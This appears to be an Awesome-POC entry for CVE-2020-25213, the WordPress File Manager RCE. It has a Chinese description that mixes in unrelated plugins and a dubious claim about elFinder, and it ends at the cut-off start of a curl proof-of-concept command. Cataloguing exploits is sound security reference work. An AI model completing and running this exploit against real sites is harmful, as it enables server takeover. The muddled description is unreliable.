https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/WordPress%20File%20Manager%EF%BC%9C6.9%20RCE%20CVE-2020-25213.md

标题： wordpress 代码问题漏洞 (CVE-2020-25213)
描述：WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。ghost是使用在其中的一个用于导入/导出WordPress数据的插件。relevant是使用在其中的一个相关内容显示插件。File Upload是使用在其中的一个文件上传插件。PHP是共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发，支持多种数据库及操作系统。elFinder是一套基于Drupal平台的、开源的AJAX文件管理器。该产品提供多文件上传、图像缩放等功能。 Word

 # WordPress File Manager＜6.9 RCE CVE-2020-25213

## 漏洞复现

poc：

```
curl -ks --max-time 5 -F "reqid=

...